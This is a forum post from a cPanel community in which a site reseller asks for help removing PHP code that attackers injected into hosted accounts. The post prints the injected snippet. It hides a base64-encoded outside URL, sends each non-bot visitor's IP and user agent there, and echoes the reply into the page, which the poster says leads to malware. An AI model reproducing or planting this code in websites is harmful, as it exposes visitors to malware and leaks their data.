The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Problem with code inserted in base64_decode php scripts from accounts.

Discussion in 'General Discussion' started by michel.rw, Apr 4, 2012.

  1. michel.rw

    michel.rw Registered

    Joined:
    Jun 13, 2011
    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    1
    Hi there, I have a serious problem.

    I have several domains hosted in my reseller, and a few days ago these areas were invaded and changed files "php" accounts.
    By checking these changes, I noticed that were inserted the following code in the files:

    <?php
    if (!isset($sRetry))
    {
    global $sRetry;
    $sRetry = 1;
    **** ****// This code use for global bot statistic
    **** ****$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // ****Looks for google serch bot
    **** ****$stCurlHandle = NULL;
    **** ****$stCurlLink = "";
    **** ****if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(st$
    **** ****{
    **** **** **** ****if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create ****bot analitics
    **** **** **** ****$stCurlLink = base64_decode( 'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&dom$
    **** **** **** **** **** ****$stCurlHandle = curl_init( $stCurlLink );
    **** ****}
    **** ****}
    if ( $stCurlHandle !== NULL )
    {
    **** ****curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    **** ****$sResult = @curl_exec($stCurlHandle);
    **** ****if ($sResult[0]=="O")
    **** **** {$sResult[0]=" ";
    **** **** ****echo $sResult; // Statistic code end
    **** **** ****}
    **** ****curl_close($stCurlHandle);
    }
    }
    ?>

    Analyzing this code we find that it is an encrypted link that redirects to a page from a server that installs malware on a PC.
    Urgently need to remove that code and I can not find a way to remove this code.

    I need help.
    I learned that with regular expressions would be easier to remove that code from the pages affected.
     
    #1 michel.rw, Apr 4, 2012
    Last edited: Apr 4, 2012
Loading...

Share This Page